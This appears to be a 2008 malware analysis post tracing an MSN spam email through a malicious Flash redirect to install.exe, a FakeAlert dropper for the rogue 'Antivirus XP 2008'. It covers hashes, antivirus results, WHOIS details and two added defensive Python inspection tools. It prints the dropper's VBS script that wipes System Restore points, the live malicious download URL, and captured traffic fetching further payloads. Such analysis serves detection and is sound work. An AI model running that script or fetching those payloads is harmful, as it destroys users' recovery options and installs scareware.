Today's new spam is an MSN Featured Offers email linking to a malicious Flash file hosted on a free image hosting website, ImageShack.

First of all, a couple of references to read in case you are not familiar with the different aspects of this type of spam and with redirects through Flash files. Additional reading: any topic prefixed with the word "spam".

Subject: Official Update 2008!
Body: Free Update Windows XP,Vista
Hovering over the "Free Update Windows XP,Vista" link reveals that clicking it will take us to a Flash file. Hmm ... a strange way to update your OS, isn't it?
If you click on the link (something you should NOT do), a new Internet Explorer window opens, displays the Flash file and prompts you to download install.exe. If the Information Bar is active, you'll get a warning.
<h4>
Inside the Flash file
</h4>
The malicious Flash file contains a link to 89.187.49.18/install.exe and uses ActionScript 3.0 packages.
Below is a general overview of its construction.
The 3 text fields contain some very strange strings.
Textbox acts as a "listbox" and contains line1, line2 and line3. They are visible in the animation.
A treeview is sometimes better to show dependencies.
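As an added example (not code from the original post, and not the real Flash sample), here is a small Python inspector that does offline what the screenshots above show: it reads the 8-byte SWF header, inflates a zlib-compressed CWS body and pulls URL-like strings and ActionScript 3 networking API names out of the raw bytes, which is enough to spot a redirect-to-EXE stub without a Flash decompiler. The SWF it builds for itself is constructed; the embedded strings and the list of AS3 API names it looks for are assumptions about what such a stub typically contains.

```python
"""Offline SWF inspector: header parse, CWS inflate, string and AS3 API scan."""
import re
import struct
import zlib
from dataclasses import dataclass, field

# Candidate network reference: optional scheme, an IPv4 address or dotted
# hostname, optional port, and a path. Matches "89.187.49.18/install.exe"
# with or without a leading http://.
NETWORK_REF_RE = re.compile(
    rb"(?:https?://)?"
    rb"(?:(?:\d{1,3}\.){3}\d{1,3}|[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)"
    rb"(?::\d{1,5})?"
    rb"/[A-Za-z0-9._~/%?=&-]+"
)

# AS3 names a redirect stub needs (assumed list); in a 3 KB SWF they are a tell.
AS3_NET_APIS = (b"navigateToURL", b"URLRequest", b"flash.net", b"URLLoader")


@dataclass
class SwfInfo:
    signature: str          # FWS = uncompressed, CWS = zlib, ZWS = LZMA
    version: int
    declared_length: int    # uncompressed file length stored in the header
    body_length: int        # bytes actually recovered after the 8-byte header
    network_refs: list = field(default_factory=list)
    api_hits: list = field(default_factory=list)


def split_swf(data: bytes):
    """Return (signature, version, declared_length, uncompressed_body)."""
    if len(data) < 8:
        raise ValueError("too short to be an SWF")
    sig = data[:3].decode("ascii", "replace")
    version = data[3]
    declared = struct.unpack("<I", data[4:8])[0]
    if sig == "FWS":
        body = data[8:]
    elif sig == "CWS":
        # decompressobj tolerates a truncated stream, which captured samples often are
        body = zlib.decompressobj().decompress(data[8:])
    elif sig == "ZWS":
        raise ValueError("ZWS (LZMA) SWF not handled by this example")
    else:
        raise ValueError(f"not an SWF, signature {sig!r}")
    return sig, version, declared, body


def inspect_swf(data: bytes) -> SwfInfo:
    sig, version, declared, body = split_swf(data)
    refs = sorted({m.decode("latin-1") for m in NETWORK_REF_RE.findall(body)})
    apis = [name.decode() for name in AS3_NET_APIS if name in body]
    return SwfInfo(sig, version, declared, len(body), refs, apis)


def make_sample_swf() -> bytes:
    """Constructed test input: a CWS container whose body mimics the strings an
    AS3 redirect stub leaves in its constant pool. Not the real sample."""
    body = (
        b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x00\x18\x01\x00"  # frame size/rate/count (dummy)
        + b"\x44\x11\x08\x00\x00\x00\x00\x00"                    # FileAttributes tag
        + b"\x3f\x03\x40\x00\x00\x00"                            # DoABC tag header (dummy length)
        + b"\x00flash.net\x00navigateToURL\x00URLRequest\x00"
        + b"\x1fhttp://89.187.49.18/install.exe\x00"
        + b"\x04line1\x00line2\x00line3\x00"
    )
    header = b"CWS" + bytes([9]) + struct.pack("<I", 8 + len(body))
    return header + zlib.compress(body)


if __name__ == "__main__":
    info = inspect_swf(make_sample_swf())
    print(info.signature, info.version, info.declared_length, info.body_length)
    for ref in info.network_refs:
        print("network reference:", ref)
    print("AS3 network APIs:", ", ".join(info.api_hits))
```

Feeding a real download to inspect_swf(open(path, "rb").read()) gives the same three things a triage needs: whether the container is compressed (CWS hides the strings from a naive grep), which hosts or IPs it references, and whether it carries AS3 networking code at all.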
File details.

File size: 3240 bytes
MD5...: ed104e3720cdcec8c3b702a9c0989ccb
SHA1..: 689af13492c1d13bac751940fb9a599e43cbf3db
SHA256: d17ecf4ea0dd52a13495c2584eb765c32b5c7931d21f137f1a63401479ca1df5
PEiD..: -
TrID..: File type identification
Macromedia Flash Player Compressed Movie (100.0%)
PEInfo: -
packers (Kaspersky): Swf2Swc

scan result: 0/36 (0%)

<h4>
install.exe
</h4>
Filename: install.exe

Additional information
File size: 203776 bytes
MD5...: 0f44ed00c0b67d9e5062b8e2c3574345
SHA1..: 4d9b42bbd950ea0c253a483ea2db3f888055c1c6
SHA256: e5885411c5ab7dbf2846b3b0606f6b294bbc9203ec8065d13560470ceab07c07
PEiD..: -
QUOTE
File install.exe received on 08.27.2008 22:10:29 (CET)
AhnLab-V3 2008.8.27.1 2008.08.27 -
AntiVir 7.8.1.23 2008.08.27 -
Authentium 5.1.0.4 2008.08.27 -
Avast 4.8.1195.0 2008.08.27 -
AVG 8.0.0.161 2008.08.27 Downloader.FraudLoad.N
BitDefender 7.2 2008.08.27 Trojan.FakeAlert.ACE
CAT-QuickHeal 9.50 2008.08.26 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.27 -
DrWeb 4.44.0.09170 2008.08.27 Trojan.Packed.619
eSafe 7.0.17.0 2008.08.26 Suspicious File
eTrust-Vet 31.6.6052 2008.08.27 -
Ewido 4.0 2008.08.27 -
F-Prot 4.4.4.56 2008.08.27 -
F-Secure 7.60.13501.0 2008.08.27 -
Fortinet 3.14.0.0 2008.08.27 -
GData 19 2008.08.27 -
Ikarus T3.1.1.34.0 2008.08.27 -
K7AntiVirus 7.10.428 2008.08.25 -
Kaspersky 7.0.0.125 2008.08.27 -
McAfee 5371 2008.08.27 Downloader-ASH.gen.b
Microsoft 1.3807 2008.08.25 -
NOD32v2 3393 2008.08.27 a variant of Win32/Kryptik.E
Norman 5.80.02 2008.08.27 W32/Tibs.gen225
Panda 9.0.0.4 2008.08.27 -
PCTools 4.4.2.0 2008.08.27 -
Prevx1 V2 2008.08.27 Malicious Software
Rising 20.59.21.00 2008.08.27 -
Sophos 4.33.0 2008.08.27 -
Sunbelt 3.1.1582.1 2008.08.26 -
Symantec 10 2008.08.27 -
TheHacker 6.3.0.6.060 2008.08.23 -
TrendMicro 8.700.0.1004 2008.08.27 -
VBA32 3.12.8.4 2008.08.27 -
ViRobot 2008.8.27.1352 2008.08.27 -
VirusBuster 4.5.11.0 2008.08.27 -
Webwasher-Gateway 6.6.2 2008.08.27 -
<h4>
Technical details
</h4>
FraudLoad / FakeAlert.
  • Changes the wallpaper and screensaver on the computer. The user's permissions to change the background image and the screensaver are disabled as well.
  • Disables the Windows System Restore feature, which deletes all currently existing restore points, then re-enables it and creates a new restore point. This is performed by a VBS script.
  • Installs a rogue anti-spyware application.
For detailed registry and file changes, please refer to this topic.

<h4>
Notes
</h4>
Upon execution, install.exe immediately changes your background to a new wallpaper.
Windows Script Host is then launched to disable and re-enable System Restore in order to clear all previous restore points and create a new one.
CODE
' Disable System Restore through the WMI SystemRestore class
' (root\default namespace); this wipes every existing restore point.
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.Disable("")

' Re-enable it straight away so nothing looks wrong to the victim ...
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.Enable("")

' ... and create one fresh restore point that already contains the infection.
' Restore point type 10 = DEVICE_DRIVER_INSTALL, event type 100 = BEGIN_SYSTEM_CHANGE
CONST DEVICE_DRIVER_INSTALL = 10
CONST BEGIN_SYSTEM_CHANGE = 100
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.CreateRestorePoint _
    ("Last good restore point", DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)
' If the first attempt failed, wait 10 seconds; the call is then repeated
' regardless of the first result.
If (errResults <> 0) then
    WScript.Sleep 10000
End if
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.CreateRestorePoint _
    ("Last good restore point", DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)
Internet access is then requested in order to download additional components. The file will be saved as %Temp%\.ttc.tmp.
CODE
GET /images/1219869555/d869c6f2f70dd3dcf64b047f99f46be8/d0d85412-d5b1-4376-9071-9f24cc1401f7.gif HTTP/1.1
Range: bytes=0-
User-Agent: Internet Explorer
Host: avxp-2008.net

HTTP/1.1 302 Found
Server: nginx/0.6.26
Date: Wed, 27 Aug 2008 20:40:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Location: http://stat.avxp-2008.net/soft3/common/16.gif
Content-Length: 0
----------------------------------------------------------------------------
GET /soft3/common/16.gif HTTP/1.1
User-Agent: Internet Explorer
Connection: Keep-Alive
Host: stat.avxp-2008.net

HTTP/1.1 206 Partial Content
Server: nginx/0.6.26
Date: Wed, 27 Aug 2008 20:40:29 GMT
Content-Type: image/gif
Content-Length: 1619081
Last-Modified: Wed, 27 Aug 2008 20:19:20 GMT
Connection: keep-alive
.ttc.tmp is then launched by install.exe with some command-line parameters.
CODE
22:39:58 [EXECUTION] "c:\documents and settings\kly\local settings\temp\.ttc.tmp" was allowed to run
         [EXECUTION] Started by "c:\documents and settings\kly\desktop\install.exe" [760]
         [EXECUTION] Commandline - [ "c:\documents and settings\kly\local settings\temp\.ttc.tmp"  /aid="d869c6f2f70dd3dcf64b047f99f46be8" /dom="http://avxp-2008.net" ]
An EULA is displayed for Antivirus XP 2008 but, as seen in the screenshot, you can't cancel the install or refuse the license agreement. You can't even close the window.
Another VBS script pins 2 Antivirus XP 2008 shortcuts to the Start menu. Antivirus XP 2008 is now "installed" and the program performs an initial scan.
Antivirus XP 2008 will periodically check for "database updates". Notice how AntivirXP08 has been appended to the default User-Agent string.
CODE
GET /updates/check.html HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AntivirXP08)
Host: www.avxp-2008.net
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.6.26
Date: Wed, 27 Aug 2008 20:49:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Last-Modified: Wed, 20 Aug 2008 11:18:32 GMT
ETag: "de9446-57-5d547200"
Accept-Ranges: bytes
Content-Length: 87

<pre>
APP_VER=3.5.1.20
DATABASE_VER=3.5.1.20
SIGNATURES=60532
DATE=17/12/07
</pre>
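As an added example, not part of the original post: a Python parser for HTTP exchanges pasted from a sniffer, covering both the 302-then-206 download of .ttc.tmp above and the update check. It splits the text into request and response messages, rebuilds the hop chain (URL, status, Location) and flags User-Agent anomalies: the bare "Internet Explorer" string install.exe uses and the AntivirXP08 token appended to the IE default. The sample capture is constructed from the exchanges shown in this post with most headers trimmed; the set of baseline IE6 / XP tokens is an assumption.

```python
"""Offline parser for HTTP exchanges pasted from a sniffer: rebuilds the hop
chain (URL, status, Location) and flags User-Agent anomalies."""
import re
from dataclasses import dataclass, field
from typing import Optional

START_RE = re.compile(r"^(?:(?P<method>GET|POST|HEAD) (?P<target>\S+) HTTP/\d\.\d"
                      r"|HTTP/\d\.\d (?P<status>\d{3})\b.*)$")
# Assumed baseline: the default IE6 / Windows XP SP2 User-Agent tokens.
EXPECTED_UA_TOKENS = {"compatible", "MSIE 6.0", "Windows NT 5.1", "SV1"}


@dataclass
class HttpMessage:
    method: Optional[str] = None   # None for a response
    target: Optional[str] = None
    status: Optional[int] = None   # None for a request
    headers: dict = field(default_factory=dict)

    def header(self, name: str) -> Optional[str]:
        return self.headers.get(name.lower())


def parse_capture(text: str) -> list:
    """Headers stop at the first blank line, so body lines such as
    'APP_VER=...' and '-----' separators are never taken for headers."""
    messages, current, in_body = [], None, False
    for line in text.splitlines():
        m = START_RE.match(line.rstrip("\r"))
        if m:
            current = HttpMessage(m["method"], m["target"],
                                  int(m["status"]) if m["status"] else None)
            messages.append(current)
            in_body = False
        elif current is None or in_body or line.startswith("-----"):
            continue
        elif not line.strip():
            in_body = True
        else:
            name, sep, value = line.partition(":")
            if sep:
                current.headers[name.strip().lower()] = value.strip()
    return messages


def hop_chain(messages: list) -> list:
    """One dict per request: URL, User-Agent, and the status and Location of
    the response that follows it (None when no response was captured)."""
    hops = []
    for msg in messages:
        if msg.method is not None:
            hops.append({"url": f"http://{msg.header('host') or '?'}{msg.target}",
                         "user_agent": msg.header("user-agent"),
                         "status": None, "location": None})
        elif hops and hops[-1]["status"] is None:
            hops[-1]["status"] = msg.status
            hops[-1]["location"] = msg.header("location")
    return hops


def user_agent_flags(ua: Optional[str]) -> list:
    """Why a User-Agent does not look like the baseline browser."""
    if not ua:
        return ["missing User-Agent"]
    if not ua.startswith("Mozilla/"):
        return [f"non-browser User-Agent: {ua!r}"]
    inside = re.search(r"\((.*?)\)", ua)
    tokens = [t.strip() for t in inside.group(1).split(";")] if inside else []
    return [f"unexpected User-Agent token: {t}" for t in tokens
            if t not in EXPECTED_UA_TOKENS and not t.startswith(".NET CLR")]


def analyse(text: str) -> dict:
    hops = hop_chain(parse_capture(text))
    flags = {f for hop in hops for f in user_agent_flags(hop["user_agent"])}
    return {"hops": hops, "ua_flags": sorted(flags)}


# Constructed from the exchanges shown in this post, with most headers trimmed.
SAMPLE_CAPTURE = """\
GET /images/1219869555/d869c6f2f70dd3dcf64b047f99f46be8/d0d85412-d5b1-4376-9071-9f24cc1401f7.gif HTTP/1.1
User-Agent: Internet Explorer
Host: avxp-2008.net

HTTP/1.1 302 Found
Location: http://stat.avxp-2008.net/soft3/common/16.gif
Content-Length: 0
----------------------------------------------------------------------------
GET /soft3/common/16.gif HTTP/1.1
User-Agent: Internet Explorer
Host: stat.avxp-2008.net

HTTP/1.1 206 Partial Content
----------------------------------------------------------------------------
GET /updates/check.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AntivirXP08)
Host: www.avxp-2008.net

HTTP/1.1 200 OK
Content-Length: 87

APP_VER=3.5.1.20
"""
```

Calling analyse(SAMPLE_CAPTURE) yields three hops with statuses 302, 206 and 200, the Location of the first equal to the URL of the second, and two flags: the non-browser "Internet Explorer" string and the AntivirXP08 token. Pointing user_agent_flags at the User-Agent column of a proxy log catches the same two tells at scale.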
Of course the victim is constantly nagged to purchase the rogue product, and it may even display fake "Insecure Browsing" warnings.

----------------------------------------------------------------
IP details :
----------------------------------------------------------------

-----------------------------
install.exe | 89.187.49.18
-----------------------------

inetnum: 89.187.49.0 - 89.187.49.255
netname: WHS-49
org: ORG-KL46-RIPE
descr: Web hosting service
country: MD

QUOTE
FTP - 21 220 localhost.localdomain FTP server (Version 6.00LS) ready.

SMTP - 25 Error: TimedOut
HTTP - 80 HTTP/1.1 200 OK
Date: Thu, 28 Aug 2008 10:09:16 GMT
Server: Apache/2.2
Last-Modified: Sun, 25 Nov 2007 15:28:47 GMT
ETag: "1088018-e38-80fb49c0"
Accept-Ranges: bytes
Content-Length: 3640
Connection: close
Content-Type: text/html




-----------------------------

Avxp-2008.net
Axpfixer.com
Antivirusonline-2009.com

78.159.96.17

-----------------------------

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: AVXP-2008.NET

Domain servers in listed order:
ns7.avxp-2008.net
ns11.avxp-2008.net
ns10.avxp-2008.net
Administrative Contact:
AntiVirXP inc
Lynn P. Brewer .info@avxp-2008.net

-----------------------------

ns1.avxp-2008.net = [ 78.159.96.17 ]
ns2.avxp-2008.net = [ 78.159.96.17 ]
ns10.avxp-2008.net = [ 78.159.96.17 ]
ns11.avxp-2008.net = [ 78.159.96.16 ]

78.159.96.17 = [ 78-159-96-17.internetserviceteam.com ]

inetnum: 78.159.96.0 - 78.159.103.255
netname: NETDIRECT-NET
descr: netdirekt e.K.
remarks: INFRA-AW
country: DE

-----------------------------

ns7.avxp-2008.net = [ 85.17.45.51 ]

85.17.45.51 = [ hosted-by.leaseweb.com ]

inetnum: 85.17.45.0 - 85.17.45.255
netname: LEASEWEB
descr: LeaseWeb
descr: 1090BB AMSTERDAM
descr: Netherlands
remarks: INFRA-AW
country: NL

-----------------------------